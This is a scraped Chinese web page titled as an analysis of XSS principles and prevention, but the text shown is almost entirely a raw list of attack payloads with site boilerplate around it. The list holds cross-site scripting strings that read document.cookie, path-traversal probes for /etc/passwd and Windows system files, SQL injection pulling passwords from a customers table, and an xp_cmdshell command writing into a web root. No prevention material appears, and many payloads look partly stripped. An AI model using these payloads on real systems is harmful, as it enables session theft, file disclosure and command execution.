跨站脚本攻击XSS原理与防范实例分析 您所在的位置:网站首页 xss原理 跨站脚本攻击XSS原理与防范实例分析

跨站脚本攻击XSS原理与防范实例分析

#跨站脚本攻击XSS原理与防范实例分析| 来源: 网络整理| 查看: 265

'>alert(document.cookie) ='>alert(document.cookie) alert(document.cookie) alert(vulnerable) %3Cscript%3Ealert('XSS')%3C/script%3E alert('XSS') %0a%0aalert(\"Vulnerable\").jsp %22%3cscript%3ealert(%22xss%22)%3c/script%3e %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html %3f.jsp %3f.jsp alert('Vulnerable'); alert('Vulnerable') ?sql_debug=1 a%5c.aspx a.jsp/alert('Vulnerable') a/ a?alert('Vulnerable') ">alert('Vulnerable') ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&& %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E %3Cscript%3Ealert(document. domain);%3C/script%3E& %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID= 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname= http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd ..\..\..\..\..\..\..\..\windows\system.ini \..\..\..\..\..\..\..\..\windows\system.ini '';!--"=&{()} "";' > out a=/XSS/alert(a.source) @im\port'\ja\vasc\ript:alert("XSS")'; alert('XSS'); .XSS{background-image:url("javascript:alert('XSS')");} BODY{background:url("javascript:alert('XSS')")} getURL("javascript:alert('XSS')") a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d); "> function a(){alert('XSS');}



【本文地址】

公司简介

联系我们

今日新闻

    推荐新闻

    专题文章
      CopyRight 2018-2019 实验室设备网 版权所有